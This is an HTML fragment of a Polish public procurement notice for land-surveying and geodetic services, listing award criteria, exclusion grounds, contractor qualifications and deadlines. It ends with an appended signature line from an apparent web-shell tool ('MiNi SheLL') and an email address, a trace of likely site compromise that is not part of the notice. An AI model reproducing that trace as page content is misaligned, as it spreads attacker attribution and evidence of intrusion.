Główny kod CPV: <span class="normal">71332000-4 - Geotechniczne usługi inżynieryjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71311000-1 - Usługi doradcze w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących kryteriów: kryterium „CENA” – waga 60%<br/>kryterium „KWALIFIKACJE ZAWODOWE I DOŚWIADCZENIE OSÓB WYZNACZONYCH DO REALIZACJI KLUCZOWYCH CZĘŚCI ZAMÓWIENIA” – waga 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">KWALIFIKACJE ZAWODOWE I DOŚWIADCZENIE OSÓB WYZNACZONYCH DO REALIZACJI KLUCZOWYCH CZĘŚCI ZAMÓWIENIA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1.	nie podlegają wykluczeniu - obligatoryjne przesłanki wykluczenia art. 108 ust. 1 ustawy PZP, art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 roku o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego oraz fakultatywne przesłanki z art. 109 ust.1 pkt 4, 7-8 i 10 ustawy PZP oraz<br/>2.	spełniają warunki udziału w postępowaniu - dotyczące:<br/>2.1 zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie stawia szczególnych wymagań w tym zakresie;<br/>2.2 uprawnień do prowadzenia określonej działalności zawodowej, o ile to wynika z odrębnych przepisów	<br/>Zamawiający nie stawia szczególnych wymagań w tym zakresie;<br/>2.3 sytuacji ekonomicznej lub finansowej<br/>Niniejszy warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 200 tysięcy złotych<br/>2.4 zdolności technicznej lub zawodowej<br/>Niniejszy warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że: <br/>1)	w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał przynajmniej:<br/>a)	3 usługi geodezyjno-kartograficzne polegające na wykonaniu odrębnych podziałów (przez odrębny podział rozumie się jedno zgłoszenie do PODGiK bez względu na ilość działek objętych podziałem),<br/>b)	wznowienie / okazanie punktów granicznych – 3 sztuki (przez odrębne wznowieni / okazanie rozumie się okazanie w terenie granic jednej działki)<br/>c)	pomiary sposobu zagospodarowania terenu 3 sztuki <br/>d)	mapy do ustanowienia służebności drogowych 3 sztuki<br/>e)	mapy sposobu korzystania z nieruchomości 3 sztuki<br/>2)	dysponuje co najmniej osobą, skierowaną do realizacji zamówienia, która posiada następujące kwalifikacje i doświadczenie zawodowe tj.: <br/>a)	uprawnienia zawodowe określone w ustawie z dnia 17 maja 1989r. prawo geodezyjne i kartograficzne (tekst jednolity Dz. U. z 2021 poz. 1990 ze zm.)w zakresie: <br/>- geodezyjnych pomiarów sytuacyjno-wysokościowych, realizacyjnych i inwestycyjnych<br/>- rozgraniczania i podziałów nieruchomości (gruntów) oraz sporządzania dokumentacji do celów prawnych <br/>- ukończony kurs w zakresie gleboznawczej klasyfikacji gruntów) <br/>b)	wyznaczona osoba musi wykazać się znajomością aktualnych przepisów ustawy prawo geodezyjne i kartograficzne, ustawy o gospodarce nieruchomościami, ustawy o gospodarowaniu nieruchomościami rolnymi Skarbu Państwa, ustawy prawo wodne, ustawy prawo budowlane, kodeksu postępowania administracyjnego, kodeksu cywilnego. znajomością programu C-geo. <br/>c)	wyznaczona osoba musi wykazać się przynajmniej 3- letnim doświadczeniem w zakresie podziałów nieruchomości i rozgraniczania nieruchomości oraz geodezyjnych pomiarów sytuacyjno-wysokościowych, w tym winna w okresie ostatnich trzech lat przed wszczęciem postępowania wykonać:<br/>-	co najmniej 3 usługi geodezyjno-kartograficzne polegające na wykonaniu odrębnych podziałów (przez odrębny podział rozumie się jedno zgłoszenie do PODGiK bez względu na ilość działek objętych podziałem),<br/>-	co najmniej 3 wznowień / okazań punktów granicznych (przez odrębne okazanie rozumie się okazanie granic jednej działki) <br/>-	co najmniej 3 pomiary sposobu zagospodarowania terenu<br/>-	co najmniej 3 mapy do ustanowienia służebności drogowych <br/>-	co najmniej 3 mapy sposobu korzystania z nieruchomości<br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców warunek zostanie uznany za spełniony, jeżeli jeden z wykonawców spełni cały warunek samodzielnie. Zamawiający nie uzna warunku za spełniony, jeżeli uczestnicy w sumie wykażą się wymaganym doświadczeniem, ale żaden z nich indywidulane nie wykaże wykonania całego wymaganego zakresu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty, każdy wykonawca musi dołączyć oświadczenie o niepodleganiu wykluczeniu - zgodne co do treści z Załącznikiem nr 2-3 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia podmiotowych środków dowodowych, tj.<br/>1)	dokument potwierdzający posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 200 000,00 zł;<br/>2)	wykazu usług wykonanych lub wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, potwierdzającego wykonanie lub wykonywanie co najmniej:<br/>a)	3 usługi geodezyjno-kartograficzne polegające na wykonaniu odrębnych podziałów (przez odrębny podział rozumie się jedno zgłoszenie do PODGiK bez względu na ilość działek objętych podziałem),<br/>b)	wznowienie / okazanie punktów granicznych – 3 sztuki (przez odrębne wznowieni / okazanie rozumie się okazanie w terenie granic jednej działki)<br/>c)	pomiary sposobu zagospodarowania terenu 3 sztuki <br/>d)	mapy do ustanowienia służebności drogowych 3 sztuki<br/>e)	mapy sposobu korzystania z nieruchomości 3 sztuki<br/>wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi były wykonane lub są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy.<br/>3) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień i doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami potwierdzającego, iż wykonawca dysponuje co najmniej jedną osobą, która będzie realizowała przedmiot umowy posiadającą następujące kwalifikacje i doświadczenie zawodowe tj.: <br/>a)	uprawnienia zawodowe określone w ustawie z dnia 17 maja 1989r. prawo geodezyjne i kartograficzne w zakresie: <br/>- geodezyjnych pomiarów sytuacyjno-wysokościowych, realizacyjnych i inwestycyjnych<br/>- rozgraniczania i podziałów nieruchomości oraz sporządzania dokumentacji do celów prawnych <br/>- ukończony kurs w zakresie gleboznawczej klasyfikacji gruntów.<br/>b)	wskazana osoba musi wykazać się znajomością aktualnych przepisów ustawy prawo geodezyjne i kartograficzne, ustawy o gospodarce nieruchomościami, ustawy o gospodarowaniu nieruchomościami rolnymi Skarbu Państwa, ustawy prawo wodne, ustawy prawo budowlane, kpa., kc., znajomością programu C-geo. <br/>c)	wskazana osoba musi wykazać się przynajmniej 3- letnim doświadczeniem w zakresie podziałów nieruchomości i rozgraniczania nieruchomości oraz geodezyjnych pomiarów sytuacyjno-wysokościowych, w tym winna w okresie ostatnich trzech lat przed wszczęciem postępowania wykonać:<br/>-	co najmniej 5 usług geodezyjno-kartograficznych polegających na wykonaniu odrębnych podziałów (przez odrębny podział rozumie się jedno zgłoszenie do PODGiK bez względu na ilość działek objętych podziałem),<br/>-	co najmniej 3 wznowień / okazań punktów granicznych (przez odrębne wznowieni / okazanie rozumie się okazanie w terenie granic jednej działki) <br/>-	co najmniej 3 pomiary sposobu zagospodarowania terenu<br/>-	co najmniej 3 mapy do ustanowienia służebności drogowych <br/>-	co najmniej 3 mapy sposobu korzystania z nieruchomości <br/>c)	W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców warunek zostanie uznany za spełniony, jeżeli jeden z wykonawców spełni warunek samodzielnie lub łącznie spełnią warunek.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Nie dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców.<br/>5. Zasady przygotowania i złożenia oferty przez Wykonawców wspólnie ubiegających się o zamówienie opisano w SWZ Do oferty, każdy wykonawca musi dołączyć oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o niepodleganiu wykluczeniu - zgodne co do treści z Załącznikiem nr 2 i 3 do SWZ;<br/>6. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie składa każdy z wykonawców Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego (w tym prowadzący działalność w formie spółki cywilnej), w okolicznościach gdy zamawiający określa warunki udziału w postępowaniu dotyczące kwalifikacji zawodowych lub doświadczenia, zobowiązani są do dołączenia do oferty oświadczenia, o którym mowa w art. 117 ust. 4 ustawy PZP, z którego wynika, które usługi wykonają poszczególni wykonawcy – zgodne o do treści z załącznikiem nr 4 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy i warunki ich wprowadzenia opisano w załączniku nr 7 do SWZ projekt umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-22 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://kowr.eb2b.com.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-22 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-10-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 3.	W kryterium „CENA” wykonawca może uzyskać maksymalnie 60 pkt. Najwyższą ilość punktów uzyska oferta zawierająca najniższą cenę, pozostałe oferty proporcjonalnie mniej. Zamawiający przyjmie do obliczeń cenę oferty podaną w Formularzu oferty. Liczba punktów dla poszczególnych ofert zostanie wyliczona według następującego wzoru:<br/>C (uzyskana ilość punktów w kryterium „CENA”) = Cn (najniższa cena spośród ofert podlegających ocenie/ Cb (cena badanej oferty) x 60 pkt<br/>4.	W kryterium „KWALIFIKACJE ZAWODOWE I DOŚWIADCZENIE OSÓB WYZNACZONYCH DO REALIZACJI KLUCZOWYCH CZĘŚCI ZAMÓWIENIA” Wykonawca może uzyskać maksymalnie 40 pkt:<br/>Zamawiający przyzna wykonawcy punkty na podstawie wskazanych przez wykonawcę w formularzu ofertowym informacji dotyczących kwalifikacji zawodowych oraz doświadczenia osób wyznaczonych do realizacji kluczowych części zamówienia - w następujący sposób:<br/>Wykonawca otrzyma punkty w niniejszym kryterium w przypadku wykazania doświadczenia zawodowego osób wyznaczonych do realizacji kluczowych części zamówienia wykraczającego ponad minimalne wymagane doświadczenie, określone w rozdziale XV SWZ tj. w przypadku wskazania wykonania:<br/>a)	powyżej 3 usług geodezyjno-kartograficznych polegających na wykonaniu odrębnych podziałów (przez odrębny podział rozumie się jedno zgłoszenie do PODGiK bez względu na ilość działek objętych podziałem),<br/>b)	powyżej 3 wznowień / okazań punktów granicznych (przez odrębne okazanie rozumie się okazanie granic jednej działki) <br/>c)	powyżej 3 pomiarów sposobu zagospodarowania terenu<br/>d)	powyżej 3 map do ustanowienia służebności drogowych <br/>e)	powyżej 3 map sposobu korzystania z nieruchomości <br/>Wykonawca otrzyma dwa punkty za każdą usługę wykonaną ponad minimalne wymagania określone powyżej do maksymalnie 40 punktów za wykazanie 20 i więcej usług ponad minimalne wymagania. <br/>W przypadku wykazania więcej niż jednej osoby zamawiający przy ocenie weźmie pod uwagę osobę z większym doświadczeniem

Creat By MiNi SheLL
Email: jattceo@gmail.com